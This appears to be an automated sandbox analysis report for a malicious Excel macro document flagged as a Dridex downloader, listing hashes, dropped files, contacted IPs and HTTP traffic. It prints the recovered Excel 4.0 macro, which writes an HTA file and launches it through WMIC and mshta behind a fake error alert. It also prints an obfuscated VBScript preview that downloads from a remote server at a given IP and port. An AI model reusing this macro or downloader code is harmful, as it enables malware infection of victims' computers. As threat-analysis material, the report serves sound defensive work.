                                                                                                                                          https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmliEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://login.windows.net/common/oauth2/authorizegzwEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                                                                                              		high

                                                                                                                                              Contacted IPs

                                                                                                                                              • No. of IPs < 25%
                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                              • 75% < No. of IPs

                                                                                                                                              Public

                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                              157.230.250.107
                                                                                                                                              		unknownUnited States
                                                                                                                                              		14061DIGITALOCEAN-ASNUSfalse

                                                                                                                                              General Information

                                                                                                                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                              Analysis ID:532305
                                                                                                                                              Start date:02.12.2021
                                                                                                                                              Start time:00:33:40
                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 6m 48s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:full
                                                                                                                                              Sample file name:08676789691.xlsm
                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                              Run name:Potential for more IOCs and behavior
                                                                                                                                              Number of analysed new started processes analysed:24
                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • HDC enabled
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal100.troj.expl.evad.winXLSM@7/8@0/1
                                                                                                                                              EGA Information:Failed
                                                                                                                                              HDC Information:Failed
                                                                                                                                              HCA Information:
                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                              • Number of executed functions: 0
                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Adjust boot time
                                                                                                                                              • Enable AMSI
                                                                                                                                              • Found application associated with file extension: .xlsm
                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                              • Attach to Office via COM
                                                                                                                                              • Scroll down
                                                                                                                                              • Close Viewer
                                                                                                                                              Warnings:
                                                                                                                                              Show All
                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                              • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.32.63, 52.109.8.25
                                                                                                                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                              Simulations

                                                                                                                                              Behavior and APIs

                                                                                                                                              TimeTypeDescription
                                                                                                                                              00:36:08API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                              00:36:10API Interceptor2x Sleep call for process: mshta.exe modified

                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                              IPs

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                              157.230.250.1073762.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                              55339.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                              08676789691.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                              55339.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                              SecuriteInfo.com.Heur.8342.xlsGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                              SecuriteInfo.com.Heur.17052.xlsGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                              SecuriteInfo.com.Heur.8342.xlsGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                              57949616735.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                              57949616735.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                              44307.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                              44307.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                              77859564213.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                              77859564213.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                              1762311.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                              1762311.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                              88985.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                              88985.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                              845725272.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                              845725272.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e

                                                                                                                                              Domains

                                                                                                                                              No context

                                                                                                                                              ASN

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                              DIGITALOCEAN-ASNUS3762.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107
                                                                                                                                              55339.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107
                                                                                                                                              08676789691.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107
                                                                                                                                              55339.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107
                                                                                                                                              SecuriteInfo.com.Heur.8342.xlsGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107
                                                                                                                                              SecuriteInfo.com.Heur.17052.xlsGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107
                                                                                                                                              SecuriteInfo.com.Heur.8342.xlsGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107
                                                                                                                                              57949616735.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107
                                                                                                                                              57949616735.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107
                                                                                                                                              44307.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107
                                                                                                                                              44307.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107
                                                                                                                                              77859564213.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107
                                                                                                                                              77859564213.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107
                                                                                                                                              1762311.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107
                                                                                                                                              1762311.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107
                                                                                                                                              88985.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107
                                                                                                                                              88985.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107
                                                                                                                                              845725272.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107
                                                                                                                                              845725272.xlsmGet hashmaliciousBrowse
                                                                                                                                              • 157.230.250.107
                                                                                                                                              invoice template 33142738819.docxGet hashmaliciousBrowse
                                                                                                                                              • 128.199.243.142

                                                                                                                                              JA3 Fingerprints

                                                                                                                                              No context

                                                                                                                                              Dropped Files

                                                                                                                                              No context

                                                                                                                                              Created / dropped Files

                                                                                                                                              C:\ProgramData\SKZbt.rtf
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):5065
                                                                                                                                              Entropy (8bit):5.099789713583044
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:ASaNk0n51Yk00oB3ou5S2cFVVg6g1zv+Be8HDklelPHKKmUgPdER3+pL:ASa20nPHzo2u5S3/gH1r+HjklsqKmUNg
                                                                                                                                              MD5:62BDEAD0241DBE996C0CE2C440AF5124
                                                                                                                                              SHA1:D4FEEF034A2C281C4C5030CEA6BDDC549BA4BCAB
                                                                                                                                              SHA-256:6139DE3D4C6B1DF9C32A8BE7AFAA0AD933C4125309671F0E962C6C8108893C14
                                                                                                                                              SHA-512:CB62632D96828E964F161AE2016A10280F1AB386A5DF8B1E51D0AB7385EAAD26DA53549A284C6C41809B865A7D100F807BFC5E80E7DECFC42BFD9E646DD2A355
                                                                                                                                              Malicious:true
                                                                                                                                              Yara Hits:
                                                                                                                                              • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\SKZbt.rtf, Author: Joe Security
                                                                                                                                              Reputation:low
                                                                                                                                              Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >....Function wBxgTuXssKyM()..Set KMJFlPtQhdWJQJhfX = CreateObject("MSX" & Chr(77) & "L2." & "Se" & "rv" & Chr(101) & "rXM" & Chr(76) & "HT" & "TP" & ".6" & "" & Chr(46) & "" & Chr(48) & "")..KMJFlPtQhdWJQJhfX.Open "" & "" & "" & "" & Chr(71) & Chr(69) & Chr(84), "htt" & Chr(112) & Chr(58) & "//" & "15" & "" & "7." & "23" & "0." & "250" & Chr(46) & "107" & Chr(58) & Chr(56) & "08" & Chr(48) & Chr(47) & "mf" & "kr" & Chr(109) & "" & "ot" & Chr(104) & "er" & Chr(102) & "uck" & "er" & "" & "u6y" & Chr(56) & "2s" & "as" & "swh" & "ore" & Chr(104) & "f9" & Chr(101), False ..KMJFlPtQhdWJQJhfX.SetRequestHeader "User-Agent","pissoff"..KMJFlPtQhdWJQJhfX.Send..End Function....Function glbufpBnrCnCJOJuH()..pKrfgXImsRngQM = "wmi" & "c p" & "ro" & "ces" &
                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7ADE8CA3-69F8-4E49-A5C6-19B4318338FA
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):140163
                                                                                                                                              Entropy (8bit):5.3581698344031405
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:FcQIfgxrBdA3gBwtnQ9DQW+zCb4Ff7nXbovidXiE6LWmE9:vuQ9DQW+zJXfH
                                                                                                                                              MD5:2833C376A955BF82CA66DAD4F0323EEF
                                                                                                                                              SHA1:C537C6533A3CAA508ADCBEAC5BEBE3D68A62A2AE
                                                                                                                                              SHA-256:E6F43CC9F168CE981E854D9B5774CBEF5B0F25FFA6A49409E417509070A6901D
                                                                                                                                              SHA-512:D6F7460985E825C542E0954DB01A6EE43A9E65278D50071DD94256EBD7CFDC72E9533E71CDEEC4EA3E4E46628F3CE0CEA48D249836AE590F53D6E51B4B55E1ED
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-01T23:34:38">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BC03255F.png
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:PNG image data, 960 x 540, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):95290
                                                                                                                                              Entropy (8bit):7.964656092224063
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:Z1M1Jci8gZKV4LZqcJ9D/ufmtLPLVNJoCH0/UN8EDmPmPH9999999GAdqT99999b:Z1M16TguaNTLGmtLfJ3hN8DqH999999q
                                                                                                                                              MD5:D3C811B819094DAD38EAECB1DFFC8E50
                                                                                                                                              SHA1:712F71711F017D47A447BF96C6D35686AB0C64FC
                                                                                                                                              SHA-256:CF5F75B2DEBB0A1D6BA1C0131DAD4FA7BC6E117CB525D853F5697EC0830615C0
                                                                                                                                              SHA-512:D181328D708F185A3AB810687D0034A56D5C5EF85D990623032FF3259A7B40BB448F5B1E17C9AE57300F6222B829FF0F685463DC889AC48F25F7B629916DE29B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview: .PNG........IHDR.............9].{....IDATx..w.%u}...L?..}....]`.I..f....cLl..h..Q.c.%?%F...A,.t.EAQz.e;...M.|~.|f.,".K.<}\...93s..;.y...PJ)....`0.....`x.c=.;`0.....`0....S......`0.....`x^`...`0.....`0.....l0.....`0.....F......`0.....y......`0.....`x^`...`0.....`0.....l0.....`xJQJ..z.w.`0<.q...0.....`0<.(..b...O..`0...S.6.....`0LA..GDj!...6.7o...7......`..`0...C)N.].......$I..)%Y..eY.l..H).uH)I.\_....>...p.'.q.F.r..W......c0..O...m0...b..D..'W.Q..,X....!..JJ.e..B.R),K..~..B.{.Rf.@..u....X...+...QJ!.`..|.........3..u..|..L...,........<_....;...<.F..R.Q...S.k.}4...'.......,F...S.5.z......E../f..U.|..k._..2.....]........Y)..D...6......q.....<..k....E....o..z.....F.....?...G...^......~................. .{.G.y$.s.....h4.B.~.z....c...:.,.8.....s.=...? MS.?..r;....d1..`0.....o".X.....:P..%..........>..8..E...0...+t;]....,^.i/<.Q.^....S_x..../......W..{..5.6>.9/y.....)%...2.lZ..g.....0......l._..v3..~,.jm.k....h].Z.....~..3{.lz..+W.....s..._..W.
                                                                                                                                              C:\Users\user\Desktop\08676789691.xlsm (copy)
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):149121
                                                                                                                                              Entropy (8bit):7.948109064340076
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:cUo0mqI7goGANx6F1M16TguaNTLGmtLfJ3hN8DqH9999999HqT99999999WnsAGS:cNqI7px6I+kLGmxfJ3hNci3Ow
                                                                                                                                              MD5:29D7EA4E6B3853FD601B61E8B4E56002
                                                                                                                                              SHA1:508481BFD36E9FEC274A46C765A19FCFB60CBB5B
                                                                                                                                              SHA-256:1F758448E89700083866A496BBD33849555FEEE0BE88467729239942FDE5A419
                                                                                                                                              SHA-512:46C2065477D4265006D6AE39C1171160F1E80C0D4B5246A6E420A6D5816B0E2A7E26087A847597581ED42A1BD2E29BAA91F549702FEB06357D4EE3F1ABC8977D
                                                                                                                                              Malicious:true
                                                                                                                                              Reputation:low
                                                                                                                                              Preview: PK..........!.z..d....w.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0...H.C.+J.r@.5.....(.....7y..=.tA.nQ/Y......Lo...XBD.].U...W.Mk.5z-.Y.I8%.wP.5 ..ooz.u.,(.a.f).'.Q....|.G;...H...<.9.S.......%p.LY..{/0.....7...c.......h).%.N...~2.....K....B.. YS....?!%*..?..n...m.9....`.].[.*.lJ...xGf.!..>l....F....1..Kn...>.....".L.%.$..q..BF?tbl...v......P.....}...jK.{.O.....<..s....BO....bZ...<mS.F..YE.[.o...w+t.K]..}@....W...]....4......i.\m3.1.@.`.fl.........PK..........!..U0#...
                                                                                                                                              C:\Users\user\Desktop\72530000
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):149121
                                                                                                                                              Entropy (8bit):7.948109064340076
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:cUo0mqI7goGANx6F1M16TguaNTLGmtLfJ3hN8DqH9999999HqT99999999WnsAGS:cNqI7px6I+kLGmxfJ3hNci3Ow
                                                                                                                                              MD5:29D7EA4E6B3853FD601B61E8B4E56002
                                                                                                                                              SHA1:508481BFD36E9FEC274A46C765A19FCFB60CBB5B
                                                                                                                                              SHA-256:1F758448E89700083866A496BBD33849555FEEE0BE88467729239942FDE5A419
                                                                                                                                              SHA-512:46C2065477D4265006D6AE39C1171160F1E80C0D4B5246A6E420A6D5816B0E2A7E26087A847597581ED42A1BD2E29BAA91F549702FEB06357D4EE3F1ABC8977D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: PK..........!.z..d....w.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0...H.C.+J.r@.5.....(.....7y..=.tA.nQ/Y......Lo...XBD.].U...W.Mk.5z-.Y.I8%.wP.5 ..ooz.u.,(.a.f).'.Q....|.G;...H...<.9.S.......%p.LY..{/0.....7...c.......h).%.N...~2.....K....B.. YS....?!%*..?..n...m.9....`.].[.*.lJ...xGf.!..>l....F....1..Kn...>.....".L.%.$..q..BF?tbl...v......P.....}...jK.{.O.....<..s....BO....bZ...<mS.F..YE.[.o...w+t.K]..}@....W...]....4......i.\m3.1.@.`.fl.........PK..........!..U0#...
                                                                                                                                              C:\Users\user\Desktop\72530000:Zone.Identifier
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):26
                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                              C:\Users\user\Desktop\~$08676789691.xlsm
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):165
                                                                                                                                              Entropy (8bit):1.6081032063576088
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                              MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                              SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                              SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                              SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                              Malicious:true
                                                                                                                                              Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                              \Device\ConDrv
                                                                                                                                              Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):160
                                                                                                                                              Entropy (8bit):5.095703110114614
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1Mgk+e6JQAiveyzowv:Yw7gJGWMXJXKSOdYiygKkXe/egk+NeAc
                                                                                                                                              MD5:16C65EF19D3D0190966313D8666D169F
                                                                                                                                              SHA1:F8961EB175400F234D2785EC9769F86765026D87
                                                                                                                                              SHA-256:4846F8456645214D4193AC1E477E7E5BDB383485837381B7344168E28A4AE9BE
                                                                                                                                              SHA-512:F930C535F00C8345086EF8BE4942CFCF2C8DE616A730A4CCDADC248BA03746C83F53C11620E72528A8B91EA4E1099F17ECC9F5F8AD2EF99335EA8CF028F28FAE
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 6124;...ReturnValue = 0;..};....

                                                                                                                                              Static File Info

                                                                                                                                              General

                                                                                                                                              File type:Microsoft Excel 2007+
                                                                                                                                              Entropy (8bit):7.937313154284356
                                                                                                                                              TrID:
                                                                                                                                              • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                                                                                                                                              • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                                                                                                                                              • ZIP compressed archive (8000/1) 8.08%
                                                                                                                                              File name:08676789691.xlsm
                                                                                                                                              File size:147380
                                                                                                                                              MD5:2ac8e068af04acae7b07a376b1adcf57
                                                                                                                                              SHA1:7034cd5a8fb78c201bfeae534c301029c2150bfe
                                                                                                                                              SHA256:7efd1141f6d4858cd381b53fabdb2906a0a23c1329dbae42327aeda63c934dfb
                                                                                                                                              SHA512:76521f32c9233328951878ab7d4cdc2a6cf5e486a7ceffdeec559fc0546254fa2aa1fbafb4ebb216a20438081852cba742ed69dabeeab581f5bb578e22c3b426
                                                                                                                                              SSDEEP:3072:wBO0LEWcTxAw3g1M16TguaNTLGmtLfJ3hN8DqH9999999HqT99999999WnsAGanJ:wBO0L23b+kLGmxfJ3hNci3Ohd4
                                                                                                                                              File Content Preview:PK..........!.8v..............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                              File Icon

                                                                                                                                              Icon Hash:74ecd0e2f696908c

                                                                                                                                              Static OLE Info

                                                                                                                                              General

                                                                                                                                              Document Type:OpenXML
                                                                                                                                              Number of OLE Files:1

                                                                                                                                              OLE File "08676789691.xlsm"

                                                                                                                                              Indicators

                                                                                                                                              Has Summary Info:
                                                                                                                                              Application Name:
                                                                                                                                              Encrypted Document:
                                                                                                                                              Contains Word Document Stream:
                                                                                                                                              Contains Workbook/Book Stream:
                                                                                                                                              Contains PowerPoint Document Stream:
                                                                                                                                              Contains Visio Document Stream:
                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                              Flash Objects Count:
                                                                                                                                              Contains VBA Macros:

                                                                                                                                              Macro 4.0 Code

                                                                                                                                              1,18,=Z46-E18
3,18,=B40*F34
6,18,=I42*Y43
8,18,=B65+P64
9,18,=U49-W58
11,18,=ALERT("Error! Send" & CHAR(105) & "ng " & CHAR(114) & "ep" & CHAR(111) & "rt to Mi" & CHAR(99) & "" & CHAR(114) & "osoft...")
13,18,=A23-M5
19,18,=L10-E62
20,18,=E16*P100
21,18,=Q58*F41
22,18,=N27-E55
23,18,=FOPEN("C:\ProgramData" & CHAR(92) & "SK" & CHAR(90) & "bt.rtf", 3)
24,18,=H34+H79
25,18,=I78*F10
26,18,=A32+P9
30,18,=R93+K87
31,18,=V7+D59
33,18,=H12+I15
34,18,=FOR.CELL("FNSCQwXUUocv",Sheet1!BZ170:BZ5234, TRUE)
41,18,=M41-L80
43,18,=Z19*O70
46,18,=B96+F23
48,18,=FWRITE(0,CHAR(FNSCQwXUUocv))
49,18,=Q4*Z87
52,18,=L26*H2
53,18,=D63+N92
55,18,=V40-C83
57,18,=A75*B34
59,18,=T48-C95
60,18,=K57+D63
61,18,=X65-D90
62,18,=NEXT()
69,18,=M93-K59
72,18,=EXEC("wm" & CHAR(105) & CHAR(99) & " process " & CHAR(99) & "all create " & CHAR(34) & "mshta C:\Pr" & CHAR(111) & "gram" & CHAR(68) & "ata\SKZbt.rtf" & CHAR(34) & "")
73,18,=W27+B58
80,18,=G24-J51
84,18,=RETURN()

                                                                                                                                              Network Behavior

                                                                                                                                              Network Port Distribution

                                                                                                                                              TCP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Dec 2, 2021 00:36:11.554271936 CET498258080192.168.2.6157.230.250.107
                                                                                                                                              Dec 2, 2021 00:36:11.827136040 CET808049825157.230.250.107192.168.2.6
                                                                                                                                              Dec 2, 2021 00:36:11.827292919 CET498258080192.168.2.6157.230.250.107
                                                                                                                                              Dec 2, 2021 00:36:11.831496954 CET498258080192.168.2.6157.230.250.107
                                                                                                                                              Dec 2, 2021 00:36:12.104157925 CET808049825157.230.250.107192.168.2.6
                                                                                                                                              Dec 2, 2021 00:36:12.467221975 CET808049825157.230.250.107192.168.2.6
                                                                                                                                              Dec 2, 2021 00:36:12.516429901 CET498258080192.168.2.6157.230.250.107

                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                              • 157.230.250.107:8080

                                                                                                                                              HTTP Packets

                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              0192.168.2.649825157.230.250.1078080C:\Windows\System32\mshta.exe
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Dec 2, 2021 00:36:11.831496954 CET12234OUTGET /mfkrmotherfuckeru6y82sasswhorehf9e HTTP/1.1
